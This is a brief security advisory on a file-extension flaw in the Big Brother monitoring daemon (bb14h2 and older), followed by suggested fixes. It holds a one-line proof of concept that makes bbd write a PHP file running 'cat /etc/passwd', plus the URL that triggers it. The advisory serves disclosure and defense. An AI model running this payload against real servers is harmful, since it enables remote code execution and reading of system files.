COMMAND

    Big Brother

SYSTEMS AFFECTED

    bb14h2 and older

PROBLEM

    'xternal' found following.   bbd listens for incoming  connections
    on port 1984.   Using telnet or the  bb client, it is  possible to
    connect and create a filename with an arbitrary extension, as  the
    extension is not rigorously checked.  As this file is droped  into
    a directory accessible via the web server, any file extension that
    is parsed server side can be abused.  For example:

        ./bb 1.2.3.4 "status evil.php3 <?<system(\"cat /etc/passwd\");?>"

    will allow viewing of the /etc/passwd upon browsing to

        http://1.2.3.4/bb/logs/evil.php3.

SOLUTION

    - Modify  bbd.c to  only allowed  specified file extensions(.disk,
      .proc ...)
    - Implement  access  restrictions  via  $BBHOME/etc/security    to
      minimize  exposure  to   vulnerabilities.   Unfortunately,   the
      default install doesn't enable the security file.